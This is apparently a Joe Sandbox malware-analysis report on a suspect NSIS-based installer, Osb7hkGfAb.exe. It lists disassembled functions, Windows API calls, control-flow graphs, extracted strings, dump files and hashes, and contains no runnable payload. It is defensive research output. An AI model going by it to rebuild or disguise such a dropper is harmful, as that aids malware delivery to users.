                                                                          Download Yara Rule
                                                                          APIs
                                                                          • FindFirstFileA.KERNELBASE(774D3410,0042C0E0,0042BC98,00405BC0,0042BC98,0042BC98,00000000,0042BC98,0042BC98,774D3410,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,774D3410,C:\Users\user\AppData\Local\Temp\), ref: 00406476
                                                                          • FindClose.KERNELBASE(00000000), ref: 00406482
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2778663305.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2778645516.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778683444.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778823275.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                          Similarity
                                                                          • API ID: Find$CloseFileFirst
                                                                          • String ID:
                                                                          • API String ID: 2295610775-0
                                                                          • Opcode ID: 834111d6c5cf34f6f1a5acdd2360b111687db49f4aa82fd60f9155d80f0d726b
                                                                          • Instruction ID: 43645372537bfa69987f3f85d1e9d0a1072f39b89fcefe97c81bac3be47e5bfd
                                                                          • Opcode Fuzzy Hash: 834111d6c5cf34f6f1a5acdd2360b111687db49f4aa82fd60f9155d80f0d726b
                                                                          • Instruction Fuzzy Hash: 9AD01231514120DFC3502B786D4C84F7A589F05330321CB36F86AF22E0C7348C2296EC
                                                                          Function 004027A1 Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • FindFirstFileA.KERNELBASE(00000000,?,00000002), ref: 004027B0
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2778663305.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2778645516.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778683444.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778823275.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                          Similarity
                                                                          • API ID: FileFindFirst
                                                                          • String ID:
                                                                          • API String ID: 1974802433-0
                                                                          • Opcode ID: a5b213f8be24180874f9adf411d6afc31dfa0cb9f64df1b0b64d1ebf68b7fd5b
                                                                          • Instruction ID: cbd12963852304709d998dbd60bf7e8f33587a64a337c4fd13578998f516bfb3
                                                                          • Opcode Fuzzy Hash: a5b213f8be24180874f9adf411d6afc31dfa0cb9f64df1b0b64d1ebf68b7fd5b
                                                                          • Instruction Fuzzy Hash: 3EF0A072604110DED711EBA49A49AFEB768AF61314F60457FF112B20C1D7B889469B3A
                                                                          Function 0040390A Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215stringregistryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 134 40390a-403922 call 406500 137 403924-403934 call 406055 134->137 138 403936-403967 call 405fde 134->138 147 40398a-4039b3 call 403bcf call 405b7d 137->147 143 403969-40397a call 405fde 138->143 144 40397f-403985 lstrcatA 138->144 143->144 144->147 152 4039b9-4039be 147->152 153 403a3a-403a42 call 405b7d 147->153 152->153 154 4039c0-4039e4 call 405fde 152->154 159 403a50-403a75 LoadImageA 153->159 160 403a44-403a4b call 40618a 153->160 154->153 161 4039e6-4039e8 154->161 163 403af6-403afe call 40140b 159->163 164 403a77-403aa7 RegisterClassA 159->164 160->159 165 4039f9-403a05 lstrlenA 161->165 166 4039ea-4039f7 call 405aba 161->166 178 403b00-403b03 163->178 179 403b08-403b13 call 403bcf 163->179 167 403bc5 164->167 168 403aad-403af1 SystemParametersInfoA CreateWindowExA 164->168 172 403a07-403a15 lstrcmpiA 165->172 173 403a2d-403a35 call 405a8f call 4060f7 165->173 166->165 171 403bc7-403bce 167->171 168->163 172->173 177 403a17-403a21 GetFileAttributesA 172->177 173->153 182 403a23-403a25 177->182 183 403a27-403a28 call 405ad6 177->183 178->171 187 403b19-403b33 ShowWindow call 406492 179->187 188 403b9c-403ba4 call 4052f0 179->188 182->173 182->183 183->173 195 403b35-403b3a call 406492 187->195 196 403b3f-403b51 GetClassInfoA 187->196 193 403ba6-403bac 188->193 194 403bbe-403bc0 call 40140b 188->194 193->178 197 403bb2-403bb9 call 40140b 193->197 194->167 195->196 200 403b53-403b63 GetClassInfoA RegisterClassA 196->200 201 403b69-403b9a DialogBoxParamA call 40140b call 40385a 196->201 197->178 200->201 201->171
                                                                          APIs
                                                                            • Part of subcall function 00406500: GetModuleHandleA.KERNEL32(?,?,?,004033BB,0000000B), ref: 00406512
                                                                            • Part of subcall function 00406500: GetProcAddress.KERNEL32(00000000,?), ref: 0040652D
                                                                          • lstrcatA.KERNEL32(1033,0042A890,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A890,00000000,00000002,774D3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Osb7hkGfAb.exe",00000000), ref: 00403985
                                                                          • lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\tranchet,1033,0042A890,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A890,00000000,00000002,774D3410), ref: 004039FA
                                                                          • lstrcmpiA.KERNEL32(?,.exe), ref: 00403A0D
                                                                          • GetFileAttributesA.KERNEL32(Call), ref: 00403A18
                                                                          • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\tranchet), ref: 00403A61
                                                                            • Part of subcall function 00406055: wsprintfA.USER32 ref: 00406062
                                                                          • RegisterClassA.USER32(0042EBC0), ref: 00403A9E
                                                                          • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403AB6
                                                                          • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403AEB
                                                                          • ShowWindow.USER32(00000005,00000000), ref: 00403B21
                                                                          • GetClassInfoA.USER32(00000000,RichEdit20A,0042EBC0), ref: 00403B4D
                                                                          • GetClassInfoA.USER32(00000000,RichEdit,0042EBC0), ref: 00403B5A
                                                                          • RegisterClassA.USER32(0042EBC0), ref: 00403B63
                                                                          • DialogBoxParamA.USER32(?,00000000,00403CA7,00000000), ref: 00403B82
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2778663305.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2778645516.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778683444.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778823275.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                          Similarity
                                                                          • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                          • String ID: "C:\Users\user\Desktop\Osb7hkGfAb.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\tranchet$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                          • API String ID: 1975747703-789139646
                                                                          • Opcode ID: eddc3fe444e159470dd51134533c2a37fedb4af5c6bfbfbca7f7312343edc14b
                                                                          • Instruction ID: 74cd8b4f7d81cde8c77274d740e3983652abf123a0ec58253698c850822a2f16
                                                                          • Opcode Fuzzy Hash: eddc3fe444e159470dd51134533c2a37fedb4af5c6bfbfbca7f7312343edc14b
                                                                          • Instruction Fuzzy Hash: EC61A5702402016ED220FB669D46F373ABCEB4474DF50403FF995B62E3DA7DA9068A2D
                                                                          Function 00402EA1 Relevance: 26.4, APIs: 5, Strings: 10, Instructions: 181memoryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 208 402ea1-402eef GetTickCount GetModuleFileNameA call 405c90 211 402ef1-402ef6 208->211 212 402efb-402f29 call 4060f7 call 405ad6 call 4060f7 GetFileSize 208->212 213 4030d1-4030d5 211->213 220 403014-403022 call 402e3d 212->220 221 402f2f 212->221 227 403024-403027 220->227 228 403077-40307c 220->228 223 402f34-402f4b 221->223 225 402f4d 223->225 226 402f4f-402f58 call 4032ea 223->226 225->226 233 40307e-403086 call 402e3d 226->233 234 402f5e-402f65 226->234 231 403029-403041 call 403300 call 4032ea 227->231 232 40304b-403075 GlobalAlloc call 403300 call 4030d8 227->232 228->213 231->228 255 403043-403049 231->255 232->228 259 403088-403099 232->259 233->228 237 402fe1-402fe5 234->237 238 402f67-402f7b call 405c4b 234->238 245 402fe7-402fee call 402e3d 237->245 246 402fef-402ff5 237->246 238->246 257 402f7d-402f84 238->257 245->246 250 403004-40300c 246->250 251 402ff7-403001 call 4065b7 246->251 250->223 258 403012 250->258 251->250 255->228 255->232 257->246 261 402f86-402f8d 257->261 258->220 262 4030a1-4030a6 259->262 263 40309b 259->263 261->246 264 402f8f-402f96 261->264 265 4030a7-4030ad 262->265 263->262 264->246 266 402f98-402f9f 264->266 265->265 267 4030af-4030ca SetFilePointer call 405c4b 265->267 266->246 269 402fa1-402fc1 266->269 270 4030cf 267->270 269->228 271 402fc7-402fcb 269->271 270->213 272 402fd3-402fdb 271->272 273 402fcd-402fd1 271->273 272->246 274 402fdd-402fdf 272->274 273->258 273->272 274->246
                                                                          APIs
                                                                          • GetTickCount.KERNEL32 ref: 00402EB2
                                                                          • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\Osb7hkGfAb.exe,00000400), ref: 00402ECE
                                                                            • Part of subcall function 00405C90: GetFileAttributesA.KERNELBASE(00000003,00402EE1,C:\Users\user\Desktop\Osb7hkGfAb.exe,80000000,00000003), ref: 00405C94
                                                                            • Part of subcall function 00405C90: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405CB6
                                                                          • GetFileSize.KERNEL32(00000000,00000000,00437000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Osb7hkGfAb.exe,C:\Users\user\Desktop\Osb7hkGfAb.exe,80000000,00000003), ref: 00402F1A
                                                                          • GlobalAlloc.KERNELBASE(00000040,00000020), ref: 00403050
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2778663305.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2778645516.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778683444.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778823275.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                          Similarity
                                                                          • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                          • String ID: "C:\Users\user\Desktop\Osb7hkGfAb.exe"$@TA$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Osb7hkGfAb.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                                          • API String ID: 2803837635-232411033
                                                                          • Opcode ID: d2642f5c1e57ff917447350ecc80b65a471f1c26fbd3ec2d1bf2d56bf534e989
                                                                          • Instruction ID: b77d5a27d8a3a8735664692b17331c00252a13d20c8f5ee7c59d5cd6c332e3a5
                                                                          • Opcode Fuzzy Hash: d2642f5c1e57ff917447350ecc80b65a471f1c26fbd3ec2d1bf2d56bf534e989
                                                                          • Instruction Fuzzy Hash: B851E471A00204ABDF20AF64DD85FAF7AB8AB14359F60413BF500B22D1C7B89E858B5D
                                                                          Function 0040618A Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 199stringCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 275 40618a-406195 276 406197-4061a6 275->276 277 4061a8-4061be 275->277 276->277 278 4061c4-4061cf 277->278 279 4063af-4063b3 277->279 278->279 282 4061d5-4061dc 278->282 280 4061e1-4061eb 279->280 281 4063b9-4063c3 279->281 280->281 285 4061f1-4061f8 280->285 283 4063c5-4063c9 call 4060f7 281->283 284 4063ce-4063cf 281->284 282->279 283->284 287 4063a2 285->287 288 4061fe-406232 285->288 289 4063a4-4063aa 287->289 290 4063ac-4063ae 287->290 291 406238-406242 288->291 292 40634f-406352 288->292 289->279 290->279 293 406244-406248 291->293 294 40625c 291->294 295 406382-406385 292->295 296 406354-406357 292->296 293->294 297 40624a-40624e 293->297 300 406263-40626a 294->300 301 406393-4063a0 lstrlenA 295->301 302 406387-40638e call 40618a 295->302 298 406367-406373 call 4060f7 296->298 299 406359-406365 call 406055 296->299 297->294 303 406250-406254 297->303 313 406378-40637e 298->313 299->313 305 40626c-40626e 300->305 306 40626f-406271 300->306 301->279 302->301 303->294 309 406256-40625a 303->309 305->306 311 406273-40628e call 405fde 306->311 312 4062aa-4062ad 306->312 309->300 321 406293-406296 311->321 314 4062bd-4062c0 312->314 315 4062af-4062bb GetSystemDirectoryA 312->315 313->301 317 406380 313->317 319 4062c2-4062d0 GetWindowsDirectoryA 314->319 320 40632d-40632f 314->320 318 406331-406334 315->318 322 406347-40634d call 4063d2 317->322 318->322 325 406336-40633a 318->325 319->320 320->318 324 4062d2-4062dc 320->324 321->325 326 40629c-4062a5 call 40618a 321->326 322->301 328 4062f6-40630c SHGetSpecialFolderLocation 324->328 329 4062de-4062e1 324->329 325->322 331 40633c-406342 lstrcatA 325->331 326->318 333 40632a 328->333 334 40630e-406328 SHGetPathFromIDListA CoTaskMemFree 328->334 329->328 332 4062e3-4062ea 329->332 331->322 336 4062f2-4062f4 332->336 333->320 334->318 334->333 336->318 336->328
                                                                          APIs
                                                                          • GetSystemDirectoryA.KERNEL32(Call,00000400), ref: 004062B5
                                                                          • GetWindowsDirectoryA.KERNEL32(Call,00000400,?,0042A070,00000000,00405256,0042A070,00000000), ref: 004062C8
                                                                          • SHGetSpecialFolderLocation.SHELL32(00405256,774D23A0,?,0042A070,00000000,00405256,0042A070,00000000), ref: 00406304
                                                                          • SHGetPathFromIDListA.SHELL32(774D23A0,Call), ref: 00406312
                                                                          • CoTaskMemFree.OLE32(774D23A0), ref: 0040631E
                                                                          • lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406342
                                                                          • lstrlenA.KERNEL32(Call,?,0042A070,00000000,00405256,0042A070,00000000,00000000,00424248,774D23A0), ref: 00406394
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2778663305.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2778645516.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778683444.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778823275.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                          Similarity
                                                                          • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                          • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                          • API String ID: 717251189-1230650788
                                                                          • Opcode ID: 8246b69a52679e6fada9b088fd1c5cd7587de1068ebf998f283e7bad78f4f284
                                                                          • Instruction ID: 7f70e83a291e570019a42af90a820afb382591873456cc4d5332d159a7ba1b0c
                                                                          • Opcode Fuzzy Hash: 8246b69a52679e6fada9b088fd1c5cd7587de1068ebf998f283e7bad78f4f284
                                                                          • Instruction Fuzzy Hash: 58612470A00110AADF206F65CC90BBE3B75AB55310F52403FE943BA2D1C77C8962DB9E
                                                                          Function 00401759 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 147stringtimeCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 406 401759-40177c call 402bce call 405afc 411 401786-401798 call 4060f7 call 405a8f lstrcatA 406->411 412 40177e-401784 call 4060f7 406->412 417 40179d-4017a3 call 4063d2 411->417 412->417 422 4017a8-4017ac 417->422 423 4017ae-4017b8 call 40646b 422->423 424 4017df-4017e2 422->424 431 4017ca-4017dc 423->431 432 4017ba-4017c8 CompareFileTime 423->432 426 4017e4-4017e5 call 405c6b 424->426 427 4017ea-401806 call 405c90 424->427 426->427 434 401808-40180b 427->434 435 40187e-4018a7 call 40521e call 4030d8 427->435 431->424 432->431 437 401860-40186a call 40521e 434->437 438 40180d-40184f call 4060f7 * 2 call 40618a call 4060f7 call 405813 434->438 449 4018a9-4018ad 435->449 450 4018af-4018bb SetFileTime 435->450 447 401873-401879 437->447 438->422 471 401855-401856 438->471 451 402a63 447->451 449->450 453 4018c1-4018cc CloseHandle 449->453 450->453 457 402a65-402a69 451->457 455 4018d2-4018d5 453->455 456 402a5a-402a5d 453->456 459 4018d7-4018e8 call 40618a lstrcatA 455->459 460 4018ea-4018ed call 40618a 455->460 456->451 464 4018f2-402382 459->464 460->464 469 402387-40238c 464->469 470 402382 call 405813 464->470 469->457 470->469 471->447 472 401858-401859 471->472 472->437
                                                                          APIs
                                                                          • lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\tranchet\Trykmaalere,00000000,00000000,00000031), ref: 00401798
                                                                          • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\tranchet\Trykmaalere,00000000,00000000,00000031), ref: 004017C2
                                                                            • Part of subcall function 004060F7: lstrcpynA.KERNEL32(?,?,00000400,0040341A,datastrrelsers Setup,NSIS Error,?,00000007,00000009,0000000B), ref: 00406104
                                                                            • Part of subcall function 0040521E: lstrlenA.KERNEL32(0042A070,00000000,00424248,774D23A0,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 00405257
                                                                            • Part of subcall function 0040521E: lstrlenA.KERNEL32(00403233,0042A070,00000000,00424248,774D23A0,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 00405267
                                                                            • Part of subcall function 0040521E: lstrcatA.KERNEL32(0042A070,00403233,00403233,0042A070,00000000,00424248,774D23A0), ref: 0040527A
                                                                            • Part of subcall function 0040521E: SetWindowTextA.USER32(0042A070,0042A070), ref: 0040528C
                                                                            • Part of subcall function 0040521E: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052B2
                                                                            • Part of subcall function 0040521E: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004052CC
                                                                            • Part of subcall function 0040521E: SendMessageA.USER32(?,00001013,?,00000000), ref: 004052DA
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2778663305.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2778645516.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778683444.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778823275.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                          • String ID: C:\Users\user\AppData\Local\Temp\nsc72B9.tmp$C:\Users\user\AppData\Local\Temp\nsc72B9.tmp\System.dll$C:\Users\user\tranchet\Trykmaalere$Call
                                                                          • API String ID: 1941528284-910802967
                                                                          • Opcode ID: 90f03a76fcf5146749e92d53d58810ea094b6bbbf58b510143803768f557fb10
                                                                          • Instruction ID: bb6028c3778eb4cec0c6c1d7eb8bf073a5325157b60575559d09146ef789c5eb
                                                                          • Opcode Fuzzy Hash: 90f03a76fcf5146749e92d53d58810ea094b6bbbf58b510143803768f557fb10
                                                                          • Instruction Fuzzy Hash: D4419A32900515BACB107BB5CC45DAF3678EF05329F20833FF426B51E1DA7C8A529A6D
                                                                          Function 004030D8 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 166COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 473 4030d8-4030ec 474 4030f5-4030fe 473->474 475 4030ee 473->475 476 403100 474->476 477 403107-40310c 474->477 475->474 476->477 478 40311c-403129 call 4032ea 477->478 479 40310e-403117 call 403300 477->479 483 4032d8 478->483 484 40312f-403133 478->484 479->478 485 4032da-4032db 483->485 486 403283-403285 484->486 487 403139-403182 GetTickCount 484->487 490 4032e3-4032e7 485->490 488 4032c5-4032c8 486->488 489 403287-40328a 486->489 491 4032e0 487->491 492 403188-403190 487->492 493 4032ca 488->493 494 4032cd-4032d6 call 4032ea 488->494 489->491 495 40328c 489->495 491->490 496 403192 492->496 497 403195-4031a3 call 4032ea 492->497 493->494 494->483 507 4032dd 494->507 500 40328f-403295 495->500 496->497 497->483 506 4031a9-4031b2 497->506 503 403297 500->503 504 403299-4032a7 call 4032ea 500->504 503->504 504->483 510 4032a9-4032b5 call 405d37 504->510 509 4031b8-4031d8 call 406625 506->509 507->491 515 40327b-40327d 509->515 516 4031de-4031f1 GetTickCount 509->516 517 4032b7-4032c1 510->517 518 40327f-403281 510->518 515->485 519 4031f3-4031fb 516->519 520 403236-403238 516->520 517->500 521 4032c3 517->521 518->485 522 403203-403233 MulDiv wsprintfA call 40521e 519->522 523 4031fd-403201 519->523 524 40323a-40323e 520->524 525 40326f-403273 520->525 521->491 522->520 523->520 523->522 528 403240-403247 call 405d37 524->528 529 403255-403260 524->529 525->492 526 403279 525->526 526->491 533 40324c-40324e 528->533 531 403263-403267 529->531 531->509 534 40326d 531->534 533->518 535 403250-403253 533->535 534->491 535->531
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2778663305.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2778645516.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778683444.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778823275.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                          Similarity
                                                                          • API ID: CountTick$wsprintf
                                                                          • String ID: ... %d%%$HBB
                                                                          • API String ID: 551687249-372310663
                                                                          • Opcode ID: 6105a75ac29723741842d4acb1fda97f5bbbd1560d169b08801a999ce2df6a86
                                                                          • Instruction ID: fb515496a62f3aa3a261881475cff076317c99cf113f2c02ef85df511ffa7adb
                                                                          • Opcode Fuzzy Hash: 6105a75ac29723741842d4acb1fda97f5bbbd1560d169b08801a999ce2df6a86
                                                                          • Instruction Fuzzy Hash: 68515C71900219ABCB10DF95DA44A9E7BA8EF54356F1481BFE800B72D0C7789A41CBAD
                                                                          Function 00401E35 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • GetDC.USER32(?), ref: 00401E38
                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E52
                                                                          • MulDiv.KERNEL32(00000000,00000000), ref: 00401E5A
                                                                          • ReleaseDC.USER32(?,00000000), ref: 00401E6B
                                                                          • CreateFontIndirectA.GDI32(0040B838), ref: 00401EBA
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2778663305.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2778645516.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778683444.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778823275.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
